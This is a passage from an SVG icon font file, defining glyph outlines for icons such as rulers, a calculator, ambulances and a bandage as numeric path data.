0 98 0 148 1 7 0 7-4 7-10 0-56 0-111 0-167v-125h0z m2-341v-29c0-21 0-42 0-64 0-23-12-36-35-36-32 0-64 0-96 0-24 1-36 13-36 38 0 15 0 30 0 45 0 6-2 9-8 8-2 0-3 0-5 0-15 1-20 6-21 22 0 34 0 69 0 104 0 92 0 183 0 275 0 2 0 4 0 6 1 12 7 18 17 18 9 0 16-7 16-18 0-23 0-47 0-71l0-278c0-17 2-20 19-20h149z m0 678h-167c2 5 3 10 4 13 20 54 40 108 61 161 3 8 5 19 16 19 10 0 13-10 16-18 22-54 44-107 66-161 2-4 3-8 4-14z m-745-10c-26 0-52 0-77 0-7 0-10 2-10 9 1 19 0 38 1 57 0 18 14 32 31 32 37 1 73 1 110 1 18-1 32-16 33-35l0-55c0-7-2-9-8-9-27 0-53 0-80 0z" />
<glyph glyph-name="ruler-pencil" horiz-adv-x="1000" unicode="&#xec00;" d="M95 620c5-4 5-9 0-13-4-5-9-9-13-13 10-11 18-19 28-29 5 6 9 11 14 16 4 5 8 4 12 0 4-4 5-8 1-13-5-5-10-9-15-14 10-10 19-19 29-28 4 5 9 11 13 16 5 5 9 4 14-1 4-4 4-8-1-12-4-5-9-10-14-15 10-10 19-18 29-27l13 15c4 4 8 5 13 1 5-5 5-9 0-14-5-4-9-9-13-13 10-10 18-18 29-29 3 4 5 8 8 12 5 5 9 12 17 5 8-8 1-13-4-18-3-3-7-6-11-9 11-11 20-19 31-29 3 5 7 10 11 15 5 5 9 6 14 1 5-5 4-9 0-13-5-5-10-9-14-13 8-8 15-15 20-20 52 56 103 112 155 168 0-1 0 0-1 1-72 68-143 136-214 205-30 28-59 57-89 86l-2-1c-6-6-12-13-19-20-43-47-86-93-129-140-2-2-5-4-7-6l0-2c9-8 18-17 28-26 4 5 8 10 12 14 4 5 8 8 14 2 6-5 4-10-1-14-4-5-9-9-13-12 11-11 19-19 29-29 4 5 9 10 13 15 4 5 8 5 13 1z m591-290c-2-1-3-3-4-4-43-46-86-92-128-138-8-8-14-18-21-27 9-8 18-17 27-27 5 6 9 11 13 16 4 4 9 5 14 0 4-4 4-9 0-13-5-5-10-9-14-13 11-11 20-20 30-30 4 5 8 10 13 15 4 5 8 5 13 1 4-5 5-9 0-13-5-5-9-10-14-15 10-10 19-18 29-28 5 6 9 11 13 16 4 5 9 4 13 0 5-4 5-8 1-13-5-5-10-9-14-14 9-10 18-18 29-28 4 5 8 10 12 15 4 6 8 5 13 1 5-4 5-9 0-13-4-5-9-9-14-13 10-11 19-19 30-30 4 6 8 11 12 17 5 5 9 4 14-1 4-4 4-8 0-12-5-5-10-10-15-15 11-9 20-18 31-29 4 6 8 11 13 16 4 5 8 5 12 1 5-5 5-9 1-14-5-4-10-9-14-13 10-10 19-18 29-28 4 4 8 8 11 13 4 5 9 8 15 2 5-5 4-10-1-15-5-4-9-8-14-12 9-9 17-16 23-23 52 56 104 112 156 168-104 99-209 199-314 300z m220 383l2 1-76 80c-2-2-3-3-4-4-193-208-385-415-578-622-3-4-5-10-5-14 1-18 2-37 2-55 1-4 1-9 2-14 22 0 44 1 65 2 8-1 13 2 18 8 192 206 383 412 574 618z m21-65c1 13 0 25-1 40-3-3-5-5-6-6-193-208-386-416-579-624-2-2-5-4-5-6-5-19-8-37-12-56 4 2 6 4 8 6 37 40 73 79 110 118 159 172 319 344 479 517 3 3 6 7 6 11z m-768-487c16 3 29 5 42 9 7 2 14 6 19 11 191 205 381 410 572 616 2 2 5 4 7 6l-1 3c-11 0-23 0-34-1-4-1-10-3-13-6-196-210-391-420-586-630-2-2-3-4-6-8z m-32-167c18 50 35 99 54 150-11-2-19-5-28-6-6-1-8-3-10-9-23-73-47-146-70-219-1-4-2-11 1-12 3-2 9-2 13-1 69 27 139 54 208 81 3 1 6 3 6 5 2 11 4 21 6 33-48-21-94-40-141-60-6 19-20 31-39 38z" />
<glyph glyph-name="ruler" horiz-adv-x="1000" unicode="&#xec01;" d="M801 845l-801-787 199-202 801 786-199 203z m61-269l-27-27-40 41-26-25 40-41-37-37-62 63-25-25 61-63-27-27-40 41-25-25 39-41-37-36-68 69-25-25 68-69-27-27-47 47-25-25 46-47-38-37-68 70-25-25 68-70-27-27-47 48-25-25 46-47-35-35-68 70-25-25 68-70-27-27-47 48-25-25 46-47-37-37-69 69-25-25 68-69-27-27-47 47-25-25 46-47-34-34-129 133 731 717 129-132-43-42-61 63-25-25 61-63z" />
<glyph glyph-name="rulers-alt" horiz-adv-x="1000" unicode="&#xec02;" d="M0 57c2 4 4 8 6 12 5 7 12 11 21 11 17 0 33 0 50 0 6-1 9 1 10 8 8 91 47 167 113 230 52 49 113 79 183 91 84 14 164 0 238-43 83-48 137-120 165-211 6-21 9-43 12-65 1-8 3-11 11-11 15 1 30 0 44 1 23 2 29-13 29-29 0-40 0-80 0-120 0-16 0-33 0-49 1-15-2-28-19-32h-841c-9 4-17 8-22 18v189z m629-160h52c0 11-1 22 0 32 0 13 12 21 21 14 5-3 7-10 8-16 1-10 0-20 0-30h126v137c-3 1-5 1-7 1-18 0-36 0-54 1-13 1-18 7-19 20-1 9-1 18-2 27-1 12-3 25-5 37-12 1-26-9-31 6-6 19 12 19 23 24-4 12-8 22-12 33-6 15-7 15-21 8-7-4-15-1-19 6-4 7-2 14 4 18 4 3 8 6 14 9-11 14-21 28-32 42-8-7-14-14-20-20-10-9-16-10-23-3-7 6-6 15 3 23 6 6 14 11 20 17l-2 4c-13 11-26 21-40 31-8-9-12-26-27-17-16 9-3 21 0 33-11 4-22 9-33 14-14 5-14 5-19-9-3-8-10-12-18-9-7 2-11 9-9 18 1 4 2 7 4 13-16 3-32 5-47 6-1 0-4-4-4-6 0-8 0-15 0-23 0-10-5-16-14-16-8-1-15 5-15 16-1 7-1 15 0 23 0 5-2 7-7 7-11-2-22-2-32-4-14-2-14-2-12-16 2-13-4-20-16-19-9 1-11 9-13 16-1 4-2 9-8 7-14-5-29-12-44-18 4-6 6-11 8-15 2-8 1-14-6-18-7-4-13-3-18 3-2 3-4 6-5 9-3 5-6 6-10 2-10-8-20-15-30-23-6-4-5-7-1-12 6-5 13-11 18-18 8-8 5-21-7-23-4-1-11 3-15 6-8 6-14 14-23 22-11-15-21-29-32-42 11-8 27-12 19-28-10-18-21-1-34 1-6-16-13-31-20-48 8-2 13-4 19-6 8-3 9-11 6-18-2-7-8-10-15-8-5 1-11 2-18 3-2-22-4-42-6-63-2-16-7-22-24-22-15-1-29-1-44 0-8 0-11-2-11-11 0-40 0-80 0-120 0-3 0-6 1-8h126c0 11-1 22 0 33 0 11 9 18 20 14 7-3 9-9 9-16 0-10 0-21 0-31h52c2 11-3 28 15 28 20 1 13-18 16-28h55c2 11-3 27 14 28 21 1 14-17 17-28h56c0 10 0 20 0 30 0 12 5 18 14 18 10 0 15-6 15-18 0-10 0-20 0-30h52c2 11-4 27 14 28 20 1 15-16 17-28h55c2 11-4 29 16 28 18-1 13-16 15-28z m371 56c-4-10-11-12-21-12-16 1-32 1-48 1 0 8-1 16 0 23 0 2 5 5 8 5 9 1 19 0 30 0v89c-9 0-18 0-26 0-7 0-10 2-11 9 0 6-3 12-4 19h41c0 19 1 36 0 54 0 1-4 4-7 4-6 1-13 0-20 0-8 0-13 5-13 13-1 8 4 15 13 15 8 1 17 0 28 0 0 19 0 36-1 54 0 1-4 4-7 4-6 1-13 0-19 0-10 0-14 5-14 14-1 9 4 14 14 14 7 1 13 1 20 0 5 0 7 2 7 7 0 15-1 29 0 44 0 7-4 7-9 7-13 0-26 0-39 0-10 1-16 6-16 14-1 7 7 14 16 14 13 0 26 1 39 0 6 0 9 1 9 8-1 14-1 28 0 42 0 6-2 8-8 8-7 0-14 0-21 1-8 0-12 4-12 12 0 9 3 14 12 15 7 1 15 0 22 1 3 0 6 3 6 6 1 15 1 30 0 45 0 2-3 5-6 6-7 1-14 0-20 0-10 1-14 5-14 14 0 9 5 14 14 14 7 0 13 0 20 0 5 0 7 2 7 7-1 15-1 29 0 44 0 6-3 7-8 7-13 0-27 0-40 0-10 1-16 6-17 13 0 8 7 15 17 15 13 1 26 1 39 0 7 0 9 3 9 9-1 14-1 28 0 41 0 6-2 9-8 8-7 0-13 0-20 0-9 1-13 6-13 14 0 10 4 14 13 14 7 0 13 0 20 0 5 0 8 2 8 7 0 32 0 63-1 94 0 1 0 2-1 5-84-91-166-181-249-271l-1 1c5 18 9 35 15 52 0 3 2 6 5 8 77 84 154 168 232 252 13 15 18 15 30-1v-883z m-375 897c9-5 13-13 15-22 14-65 28-129 43-193 4-15 0-28-4-42-15-56-30-111-45-167-1-3-2-6-3-10-8 3-16 6-22 10-2 2-2 7-1 11 8 33 17 67 26 100 7 25 15 51 20 76 2 11-1 24-3 35-6 28-13 56-19 84-2 8-5 13-14 14-13 3-25 7-38 10-4 1-10-1-13-4-26-26-51-53-75-81-4-4-6-10-8-15-17-62-33-125-50-187-2-8-7-9-13-9-20 0-19 0-14 18 18 65 35 130 53 195 1 4 3 9 6 12 48 53 97 105 145 157 3 3 7 5 10 8h4z m201-417c-29-32-59-65-88-97-7 7-13 13-20 20 1 1 3 4 5 6 36 39 72 78 108 117 4 4 12 8 17 7 8-1 11-10 11-18 0-54 0-108 0-162 0-57 0-113 0-169 0-5 1-11-7-11-8-1-10 3-11 9 0 4-1 7-2 10-14 30-10 62-10 93 0 62 0 123 0 184 0 3 0 7 0 10l-3 1z m-323 24c-8 1-17 2-26 3 0 3 0 6 1 8 14 52 28 104 42 156 3 11 9 15 18 12 8-2 12-10 10-19-14-52-29-105-43-158 0 0-1-1-2-2z m61-14c-8 2-17 5-26 7 5 19 10 37 15 56 9 33 17 66 26 99 1 1 1 2 1 3 3 10 10 15 18 13 8-2 13-11 10-20-14-51-28-103-42-154 0-1-1-2-2-4z m-194-408c-30 0-59 0-89 0-16 0-25 10-25 25 1 81 58 162 154 179 96 17 189-42 213-138 3-14 4-30 5-44 1-12-7-20-19-21-20-1-40-1-60-1-24 0-48 0-72 0-17 0-33 0-50 0-19 0-38 0-57 0l0 0z m211 45c-5 59-65 123-150 118-70-4-122-61-127-118h277z" />
<glyph glyph-name="rulers" horiz-adv-x="1000" unicode="&#xec03;" d="M50 706l735-856 144 123-736 856-143-123z m738-810l-24 29 33 29-15 18-34-29-23 27 49 42-15 18-49-42-17 19 33 29-15 18-34-29-21 25 49 42-15 18-49-42-1 1-16 18 34 29-16 18-34-28-23 26 50 42-16 18-49-42-17 20 34 28-16 19-33-29-7 8-1 0-15 18 44 38-15 18-44-38-17 19 29 25-16 18-29-24-23 26 45 39-16 17-44-38-17 20 29 25-15 18-29-25-23 26 49 42-15 18-49-42-17 19 34 29-16 18-33-29-23 27 49 42-16 18-49-42-17 20 34 28-15 19-34-29-21 24 49 43-15 18-50-43-16 20 33 29-15 18-34-29-23 27 49 42-15 18-49-43-17 20 34 29-16 18-33-29-21 24 94 80 692-805-94-81z m-571 954l61-70h-1l18-20 656-762 0 743-734 109z m702-762l-36 42 22 19-12 13-22-19-17 20 37 32-12 14-36-32-13 14 25 22-12 14-25-22-17 20 37 32-12 13-37-32-13 15 26 22-12 13-25-22-16 19 36 32-11 13-37-32-13 15 25 22-11 13-25-22-18 21 37 31-12 14-36-32-13 15 25 21-12 14-25-22-15 18 0 1-9 9 28 25-12 13-29-25-13 14 18 16-12 13-17-15-18 20 29 25-11 14-29-26-13 15 17 15-11 14-17-15-18 19 33 28-12 14-32-28-13 15 21 18-12 13-20-18-18 20 32 28-11 14-32-28-13 14 20 18-11 14-21-18-16 18 32 28-11 14-33-28-12 15 20 17-11 14-21-18-17 20 32 28-12 13-32-27-12 14 20 18-12 13-20-17-37 42 624-92-1-626z m-88 542l-311 46 311-361 0 315z m-32-230l-200 232 201-30-1-202z" />
<glyph glyph-name="square-root" horiz-adv-x="1000" unicode="&#xec04;" d="M410 690l-127-451-34 125-10 43h-239v-115h152l75-282h108l159 566h506v114h-590z m417-217l-116-135-116 135-76-69 125-145-125-144 76-69 116 135 116-135 77 69-125 144 125 145-77 69z" />
<glyph glyph-name="ui-calculator" horiz-adv-x="1000" unicode="&#xec05;" d="M895 107c-2-3-2-5 0-8 0-52 0-104-1-156 0-47-28-83-72-91-6-1-12-2-18-2-44 0-87 0-130 0l-35 0-8 0-261 0c-58 0-116 0-174 0-3 0-6 0-9 0-3 2-7 1-11 2h0l-4 2-5-1c-4 4-9 4-13 7l-11 7c-4 4-8 7-12 10l-14 19c-2 5-4 9-6 14l-1 3c0 0 0 0 0 1l0 1-3 11-1 18c0 1 0 1 0 2 2 2 1 5 1 7v169c0 3 0 5-1 7v3c1 1 1 2 0 3 0 3 0 6 0 9 2 2 1 5 1 8v233c0 3 0 5-1 8v3c1 1 1 2 0 3l0 3c1 4 2 7 0 11l0 9c2 7 1 14 0 21v8c0 3 1 5 1 8v226c0 3 1 6-1 8l0 4c2 16 2 32 0 48l0 4c2 3 2 6 0 9v3c1 4 2 7 1 10 6 46 42 79 89 79 203 0 405 0 608 0 52 0 90-38 90-90 1-34 0-68 0-102-1-1-1-2 1-4 0-6-1-12-1-19v-522c0-2 1-4 1-6z m-226 319c-5 2-9 0-14-1l-3 0-3-1-8-2c-7-2-13-4-19-8-43-20-67-77-51-123 18-52 70-82 121-71 60 14 96 73 79 132-8 26-23 46-47 59-3 3-6 6-11 6-4 4-10 5-15 5-4 3-9 3-13 4-6 0-11 1-16 0z m-279-277c0 3-3 4-5 5-21 13-45 18-70 14-39-7-66-29-81-66-14-38-8-73 18-105 37-44 106-49 148-11 46 41 48 109 6 152-5 4-9 10-16 11z m113 616v0c-75 0-150 0-226 0-48 0-87-42-86-90 0-25 0-50 0-74 0-54 38-92 92-92h194c84 0 168 0 252 0 13 0 26 3 38 10 30 19 45 44 44 81 0 28 1 55 1 82-1 44-39 83-83 83-75 0-151 0-226 0z m-276-442c0-58 46-105 104-105 56-1 105 46 105 103 0 58-46 105-102 105-59 1-106-45-107-103z m549-259c0 57-46 104-102 105-59 1-106-45-106-103-1-58 45-105 103-106 55 0 105 45 105 104z m-500 19c15 0 31 1 47 1l4-1c19 0 38 0 57 0 13 0 21-6 21-18 0-12-8-19-22-19-35 0-70 0-105 0-11 0-18 6-19 15-2 11 2 18 14 22l3 0z m94 184c-3-1-7 2-11 5-7 7-15 13-22 20-3 4-5 3-8-1-6-7-12-14-19-20-8-10-19-11-27-4-9 7-9 19-1 29 6 7 12 14 19 20 4 4 3 6-1 9-7 6-14 12-20 19-10 9-11 19-3 27 8 9 18 9 28 0 7-6 14-12 20-18 4-4 6-4 10 0 5 7 11 14 17 20 9 10 20 11 29 4 8-8 8-19-1-29-6-6-11-13-17-19-4-4-5-6 0-10 8-7 15-13 22-20 6-6 8-14 4-21-3-7-9-11-19-11z m363-160c11-7 14-13 12-22-3-10-10-15-22-15-34 0-69 0-103 0-11 0-20 6-22 16-1 9 4 16 15 21 5 0 10-1 15 1l5 0c33-1 66-1 100-1z m-61-48h51c13 0 22-7 22-18 0-11-8-19-21-19h-105c-12 0-21 7-21 18 0 11 9 19 22 19 17 0 34 0 52 0z m9 335c6-6 8-13 8-22 0-10-2-21 2-31 11 0 23 0 35 0 11 0 18-8 18-18 0-11-7-19-18-19-10 0-21 0-31 0-4 0-6-1-6-6 1-10 1-19 0-29 0-12-8-20-18-20-11 0-19 8-19 20 0 9 0 18 0 26 1 7-1 10-8 9-9-1-18 0-27 0-12 0-19 8-19 19 0 11 7 18 19 18 10 0 19 0 28 0 6 0 7 2 7 7 0 11 0 21 0 32 2 8 7 13 14 17 5-1 10-1 15-3z" />
<glyph glyph-name="aids" horiz-adv-x="1000" unicode="&#xec06;" d="M678 688c-10 34-23 67-45 98 0-3-1-4-1-6 6-56-4-111-20-165-40-130-111-245-191-356-57-80-120-156-187-230-4-4-7-12-6-17 17-64 59-113 107-160 4 5 7 10 9 14 37 58 74 116 109 175 72 120 142 241 199 368 40 91 54 184 26 279z m88-657c-30 33-60 67-89 101-29 35-56 70-85 106-25-47-49-93-73-139-2-4-1-9 1-12 47-78 95-156 144-237 12 12 22 22 31 32 34 39 64 79 77 128 2 9 0 14-6 21z m-359 250c2 0 4 0 7 1 22 35 44 70 67 104 6 8 5 14 1 22-27 54-55 108-78 163-28 68-43 139-37 216-3-5-4-6-5-7-55-94-72-194-39-297 22-69 56-135 84-202z m203 435c6 31 3 61-3 90-1 6-5 12-10 16-53 34-109 35-168 14-23-8-42-20-39-48 0-1-1-3-1-5 0-22 0-44 0-68 75 53 147 52 221 1z" />
<glyph glyph-name="ambulance-crescent" horiz-adv-x="1000" unicode="&#xec07;" d="M358 581c-1 0-4 3-5 5 0 3 0 6 0 10h20c1 5 2 9 2 13 2 16 11 26 26 32 2 1 4 2 6 3h12c20-6 33-19 34-40l1-8h22v-14c-1-1-2-1-2-1-39 0-77-1-116 0z m311-419c-13-40 9-85 50-101 6-2 13-3 19-5h19c4 1 7 2 11 3 34 8 60 41 61 76 1 36-24 70-58 79-43 13-88-10-102-52z m38-26c0 22 18 40 40 40 21 0 40-18 40-39 0-21-18-39-39-39-22 0-41 17-41 38z m-518 1c0-38 24-69 61-79 2 0 4-1 6-2h31c15 5 30 11 42 22 26 26 31 66 13 98-19 32-56 48-92 38-35-9-61-41-61-77z m42-1c0 21 18 39 40 39 22 0 40-18 40-39 0-22-18-38-41-38-21 0-39 18-39 38z m706 222c-1 56-1 112-1 168 0 18-15 33-34 33-37 0-74 0-111 0l-546-1c-21 0-35-10-44-27-5-11-10-23-15-34-17-39-33-79-50-119-2-4-5-9-9-10-22-8-34-24-38-45-7-29-12-59-18-88-3-18-5-36-8-54v-20c6-13 15-22 30-23 20-1 40-1 60-2 7 0 11 3 11 11 4 51 51 94 103 95 58 1 104-38 112-95 1-11 1-11 13-11 79 0 158 1 237 1 8 0 11 2 12 10 4 50 48 91 96 95 62 5 105-39 115-82 2-8 3-16 5-25 19 1 37 1 56 3 9 1 15 6 19 13 2 3 4 5 6 8v189c-1 3-1 7-1 10z m-587 24c0-7-3-9-10-9-47 0-94 0-141 0-7 1-15 0-23 0 1 5 1 6 1 8 19 46 38 91 56 137 2 5 6 6 11 6 32 0 64 0 96 0 7 0 10-2 10-9-1-44-1-88 0-133z m222-47c26-32 74-45 117-23-6-9-33-24-51-28-19-4-38-4-58 1-47 13-80 54-83 100-4 53 29 97 74 114 44 16 90 3 118-24-23 12-47 14-72 7-20-6-36-18-49-35-25-34-23-80 4-112z" />
<glyph glyph-name="ambulance-cross" horiz-adv-x="1000" unicode="&#xec08;" d="M358 581c-2 0-4 3-5 5 0 3 0 7 0 11h20c1 5 2 9 2 13 2 15 11 26 25 31 3 1 5 2 7 3h12c20-6 33-18 34-39l1-8h22v-15c-1 0-2-1-2-1-39 0-77 0-116 0z m311-418c-13-41 9-86 50-101 6-3 13-4 20-6h18c4 1 8 2 11 3 34 9 60 41 61 76 1 36-24 70-58 80-43 12-88-11-102-52z m38-27c0 22 18 40 40 40 22 0 40-18 40-39 0-21-18-39-39-39-22 0-41 18-41 38z m-518 1c0-37 24-69 61-79 2 0 4-1 6-2h31c15 6 30 11 42 23 26 25 32 65 13 98-18 32-55 47-92 38-35-9-61-42-61-78z m42-1c0 22 18 39 40 39 22 0 40-17 40-39 0-21-18-38-41-38-21 0-39 18-39 38z m706 222c-1 57-1 113-1 168 0 19-15 33-34 33-37 0-74 0-111 0l-546-1c-21 0-35-9-44-27-6-11-11-22-15-33-17-40-34-80-51-119-1-5-5-10-8-11-23-8-34-24-39-45-6-29-12-58-17-88-3-18-6-36-9-54v-20c6-12 15-22 30-23 21-1 41-1 61-2 7 0 10 3 11 11 4 52 51 94 103 95 57 2 104-38 111-95 2-11 2-11 14-11 79 0 158 1 237 1 8 0 11 3 11 11 5 49 49 90 97 94 62 5 105-38 115-82 2-7 3-15 5-25 19 1 37 2 56 3 9 1 15 6 19 14 2 2 4 5 5 7v190c0 3 0 6 0 9z m-587 25c0-8-3-10-10-10-47 1-94 1-141 1-7 0-15 0-24 0 2 4 2 6 2 7l56 137c2 5 6 7 11 7 32 0 64-1 96 0 7 0 10-2 9-10 0-44 0-88 1-132z m370-18h-77v-86c-10-2-20-3-30-3s-20 1-29 3v86h-78c-2 9-3 19-3 29 0 9 1 19 3 29h78v85c9 2 19 3 29 3 10 0 20-1 30-3v-85h77c2-10 3-20 3-29 0-10-1-20-3-29z" />
<glyph glyph-name="ambulance" horiz-adv-x="1000" unicode="&#xec09;" d="M768 816c-4 19-22 34-41 34h-464c-19 0-37-15-41-34l-11-57h568c0 0-11 57-11 57z m-276-40h-257l7 36c2 11 13 21 25 21h228l-3-57z m475-346h-34v213c0 38-31 69-69 69h-728c-38 0-69-31-69-69v-213h-34c-9 0-17-7-17-17v-132c0-9 8-17 17-17h34v-203c0-9 8-17 17-17h39c10 0 17-8 17-17v-160c0-9 8-17 17-17h91c10 0 17 8 17 17v160c0 9 8 17 17 17h440c10 0 17-8 17-17v-160c0-9 8-17 18-17h90c10 0 17 8 17 17v160c0 9 8 17 18 17h34c10 0 17 8 17 17v203h34c10 0 17 8 17 17v132c0 10-7 17-17 17z m-544 195c0 3 3 5 5 5h44c3 0 5 2 5 5v44c0 3 2 5 5 5h36c3 0 5-3 5-5v-44c0-3 3-5 6-5h43c3 0 5-2 5-5v-36c0-3-2-6-5-6h-43c-3 0-6-2-6-5v-43c0-3-2-5-5-5h-36c-3 0-5 2-5 5v43c0 3-3 5-5 5h-44c-3 0-5 3-5 6v36z m-285-147c0 9 8 17 17 17h690c9 0 17-8 17-17v-216c0-9-8-17-17-17h-690c-9 0-17 8-17 17l0 216z m151-387h-132c-19 0-35 16-35 35v43c0 19 16 34 35 34h132v-112z m351 0h-282c-10 0-17 7-17 15 0 8 7 14 17 14h282c9 0 17-6 17-14 0-8-8-15-17-15z m17 74c0-10-8-17-17-17h-282c-10 0-17 7-17 17v21c0 10 7 18 17 18h282c9 0 17-8 17-18v-21z m221-39c0-19-15-34-34-34h-133v112h133c19 0 34-16 34-35v-43z" />
<glyph glyph-name="autism" horiz-adv-x="1000" unicode="&#xec0a;" d="M748 531c-2 49-10 95-52 132-27 24-60 37-90 56-92 57-239 38-318-11-63-40-111-98-135-170-15-47-36-92-22-146 8-33 35-63 35-86 1-64 48-87 83-116 54-45 112-21 130 45 1 6 3 15 6 15 64 11 23 45 15 75 59-11 115-17 173-3 40 9 63 29 64 69 1 27 10 39 37 47 49 14 76 48 74 93z m218-248c-17 27-38 51-56 77-24 32-38 67-24 109 7 20 4 42-3 63-55 177-221 341-495 315-154-14-263-90-323-230-62-143-54-285 40-412 74-100 120-202 89-328-2-9-9-23 7-24 10-1 15 8 18 23 18 120-5 230-86 323-59 68-79 149-83 235-12 228 155 395 389 394 232 6 377-146 424-302 5-16 10-31 5-46-19-56-1-102 34-144 13-17 26-34 39-52 19-24 15-41-16-50-19-5-44-11-40-37 9-57-1-113 1-170 4-67 2-68-66-76-16-2-32-3-48-6-39-8-64-30-73-70-2-9-7-22 8-25 12-2 12 11 13 18 9 44 39 57 79 59 21 1 43 4 64 8 21 4 40 18 42 39 5 62 14 125 7 186-5 38 1 50 34 61 31 11 37 35 20 62z" />
<glyph glyph-name="bandage" horiz-adv-x="1000" unicode="&#xec0b;" d="M445 539c-7 5-18 4-23-3l-120-156c-6-7-5-18 3-23l249-193c8-5 18-4 23 3l121 156c5 7 4 18-3 23l-250 193z m129-209s-6-7-16-14c-8-5-19-9-24-10-4-2-7-3-9-3-27-5-46-9-59-11-9-2-16 3-16 12 0 13-1 33-4 60 0 3 0 5 0 7l0 10c1 9 4 17 6 23 3 8 12 20 20 24 13 7 28 6 40-3 8-6 13-15 14-23 2-9 6-13 15-12 9 1 18-2 26-7 16-13 19-37 7-53z m321 411l-119 92c-36 28-87 21-115-15l-206-267 249-192 206 267c27 36 21 88-15 115z m-192-29c3 5 9 5 13 2s5-9 2-13c-3-4-10-5-14-2-4 3-5 9-1 13z m-3-45c3 4 9 5 14 2 4-3 5-10 1-14-3-4-9-5-13-1-4 3-5 9-2 13z m-7-49c3 4 9 5 14 2 4-4 5-10 1-14-3-4-9-5-13-2s-5 10-2 14z m7-47c4-4 5-10 2-14-4-4-10-5-14-2-4 4-5 10-1 14 3 4 9 5 13 2z m-30 167c3 4 9 5 13 2s5-9 2-14c-3-4-9-5-14-1-4 3-5 9-1 13z m-6-44c4 5 10 5 14 2 4-3 5-9 2-13-4-4-10-5-14-2-4 3-5 9-2 13z m-8-47c3 4 9 5 13 1 5-3 5-9 2-13-3-4-9-5-13-2-4 3-5 9-2 14z m-32 79c3 4 9 5 13 1 4-3 5-9 2-13-3-4-9-5-13-2-5 4-5 9-2 14z m-82-154c-3-4-9-4-13-1-5 3-5 9-2 13 3 4 9 5 13 2 4-3 5-9 2-14z m35-27c-3-4-9-5-13-1-5 3-5 9-2 13 3 4 9 5 13 2 5-3 5-9 2-14z m6 49c-3-4-9-5-14-1-4 3-4 9-1 13 3 4 9 5 13 2 4-3 5-10 2-14z m4 52c-4-4-10-5-14-2-4 3-5 9-2 14 4 4 10 4 14 1 4-3 5-9 2-13z m25-128c-3-4-9-5-13-1-4 3-5 9-2 13s9 5 13 2c5-4 5-10 2-14z m8 48c-3-5-9-5-13-2-4 3-5 9-2 13 3 4 9 5 14 2 4-3 4-9 1-13z m7 49c-3-5-9-5-13-2-5 3-5 9-2 13 3 5 9 5 13 2 4-3 5-9 2-13z m-5 46c-4 3-5 9-2 13 3 4 10 5 14 2 4-3 5-9 2-13-4-5-10-5-14-2z m25-170c-3-4-9-5-13-2-4 4-5 10-2 14 4 4 9 5 14 2 4-4 5-10 1-14z m11 46c-4-4-10-5-14-2-4 3-5 9-2 14 4 4 10 4 14 1 4-3 5-9 2-13z m-7 47c-4 3-5 9-2 14 3 4 9 5 14 1 4-3 5-9 1-13-3-4-9-5-13-2z m32-120c-4-4-10-5-14-2-4 4-5 10-2 14 4 4 10 5 14 2 4-4 5-10 2-14z m12 44c-3-4-9-5-14-2-4 3-4 10-1 14 3 4 9 5 13 1 4-3 5-9 2-13z m23-71c-4-4-10-5-14-2-4 4-5 9-2 14 4 4 10 5 14 1 4-3 5-9 2-13z m14 42c-3-4-9-5-13-1-4 3-5 9-2 13 3 4 9 5 13 2 5-4 5-10 2-14z m7 49c-3-4-9-5-13-1-5 3-5 9-2 13 3 4 9 5 13 2 4-3 5-9 2-14z m7 49c-3-4-9-5-14-1-4 3-5 9-1 13 3 4 9 5 13 2 4-3 5-9 2-14z m7 49c-4-4-10-4-14-1-4 3-5 9-2 13 4 4 10 5 14 2 4-3 5-9 2-14z m4 44c-3-4-9-5-13-2-4 4-5 10-2 14 3 4 9 5 14 2 4-4 5-10 1-14z m3 44c-3-5-9-5-13-2-4 3-5 9-2 13 3 4 9 5 14 2 4-3 5-9 1-13z m22-219c-4-4-10-5-14-1-4 3-5 9-2 13 4 4 10 5 14 2 4-3 5-9 2-14z m3 52c-3-4-10-4-14-1-4 3-5 9-1 13s9 5 13 2c4-3 5-9 2-14z m7 49c-4-4-10-4-14-1-4 3-5 9-2 13 4 4 10 5 14 2 4-3 5-9 2-14z m5 44c-4-4-10-5-14-2-4 3-5 9-2 14 4 4 10 5 14 1s5-9 2-13z m2 44c-3-5-9-5-13-2-4 3-5 9-2 13 3 5 9 5 13 2 5-3 5-9 2-13z m5 47c-3-4-9-5-13-1-4 3-5 9-2 13 4 4 9 5 14 2 4-4 5-10 1-14z m28-166c-3-4-9-5-13-2-5 4-5 10-2 14 3 4 9 5 13 2 5-4 5-10 2-14z m2 46c-3-4-9-5-14-2-4 4-4 10-1 14 3 4 9 5 13 2s5-10 2-14z m-744-537c-28-36-21-88 15-115l119-92c36-28 87-21 115 15l206 267-249 192-206-267z m178 147c3 4 9 5 13 2 4-4 5-10 2-14-3-4-9-5-14-2-4 4-4 10-1 14z m-87-144c-3-4-9-5-13-2-4 4-5 10-2 14 3 4 9 5 13 2 5-4 5-10 2-14z m2 46c-3-4-9-5-13-2s-5 10-2 14c3 4 9 5 13 2 4-4 5-10 2-14z m28-166c-4-4-10-5-14-2-4 4-5 10-2 14 4 4 10 5 14 1 4-3 5-9 2-13z m5 48c-3-4-9-5-14-2-4 3-5 9-1 13 3 5 9 5 13 2 4-3 5-9 2-13z m2 43c-3-4-9-5-13-1-4 3-5 9-2 13 3 4 9 5 14 2 4-3 5-9 1-14z m6 44c-4-4-10-5-14-2-4 3-5 9-2 14 4 4 10 5 14 1 4-3 5-9 2-13z m6 49c-3-4-9-5-13-2-4 4-5 10-2 14 3 4 9 5 14 2 4-4 5-10 1-14z m3 52c-3-4-9-5-13-2-4 3-5 10-2 14 3 4 9 5 14 1 4-3 5-9 1-13z m22-218c-3-5-9-5-14-2-4 3-5 9-1 13 3 5 9 5 13 2s5-9 2-13z m3 43c-4-4-10-5-14-2-4 4-5 10-1 14 3 4 9 5 13 2 4-4 5-10 2-14z m4 44c-3-4-9-5-13-2-4 4-5 9-2 14 4 4 9 5 14 1 4-3 5-9 1-13z m7 49c-3-4-9-5-13-2-4 4-5 9-2 14 3 4 10 5 14 1 4-3 5-9 1-13z m7 49c-3-4-9-5-13-2-5 4-5 10-2 14 3 4 9 5 13 2 4-4 5-10 2-14z m21-172c-3-5-9-5-13-2-4 3-5 9-2 13 3 4 10 5 14 2 4-3 5-9 1-13z m3 45c-3-4-9-5-14-2-4 4-5 10-1 14 3 4 9 5 13 2 4-4 5-10 2-14z m7 49c-4-4-10-5-14-2-4 4-5 10-2 14 4 4 10 5 14 2 4-4 5-10 2-14z m-9 61c3 4 9 5 14 2 4-3 5-10 1-14-3-4-9-5-13-1-4 3-5 9-2 13z m32-181c-3-4-9-5-13-2-4 4-5 10-2 14 3 4 9 5 14 2 4-4 5-10 